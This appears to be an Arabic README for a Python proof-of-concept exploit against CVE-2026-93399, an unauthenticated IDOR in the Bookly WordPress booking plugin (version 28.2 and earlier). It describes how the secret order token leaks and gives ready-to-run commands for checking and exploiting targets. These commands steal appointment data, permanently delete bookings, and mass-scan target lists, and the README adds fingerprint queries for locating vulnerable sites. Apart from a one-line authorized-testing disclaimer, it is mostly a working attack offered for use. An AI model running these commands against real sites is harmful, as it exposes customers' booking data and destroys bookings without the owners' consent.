
Python PoC لـ CVE-2026-93399، وهو IDOR غير مُصادق عليه في Bookly <= 28.2 يؤدي إلى تسريب رموز الطلبات، وكشف المواعيد، والتراجع عن الحجوزات.
Python 3 PoC لـ CVE-2026-93399 في Bookly (bookly-responsive-appointment-booking-tool).
CVE-2026-93399 — Bookly ≤ 28.2 يعاني من مرجع كائن مباشر غير آمن (CWE-639) في AJAX الحجز العام: bookly_get_form_id يخزّن order_id الذي يتحكم به المهاجم في جلسة النموذج، و**bookly_render_complete** يعيد رمز bookly_order السري الخاص بذلك الطلب دون التحقق من أن الجلسة أنشأت الطلب. يمكن للمهاجمين غير المصادق عليهم تعداد معرّفات الطلبات، وسرقة الرموز، وسحب بيانات المواعيد عبر bookly_add_to_calendar، وإلغاء/حذف الحجوزات غير المكتملة باستخدام bookly_rollback_order. CVSS 3.1: 9.1 حرج (C:N/I:H/A:H). تم إصلاحه في > 28.2.
صفحة PoC: https://pocbit.org/pocs/cve-2026-93399
فهرس الكتالوج: https://pocbit.org/pocs/
pip install -r requirements.txt
python poc.py -u https://site.example --mode check
python poc.py -u https://site.example --mode check --order-id 15
python poc.py -u https://site.example --mode check --order-start 1 --order-end 30
python poc.py -u https://site.example --mode exploit --order-id 15 --calendar
python poc.py -u https://site.example --mode exploit --order-id 15 --rollback --confirm-delete
python poc.py --list targets.example.txt --mode check -j 10 --order-start 1 --order-end 5
body="/wp-content/plugins/bookly-responsive-appointment-booking-tool/"
body="bookly_get_form_id"
للاختبار المصرّح به فقط. --rollback --confirm-delete يحذف الحجوزات نهائيًا.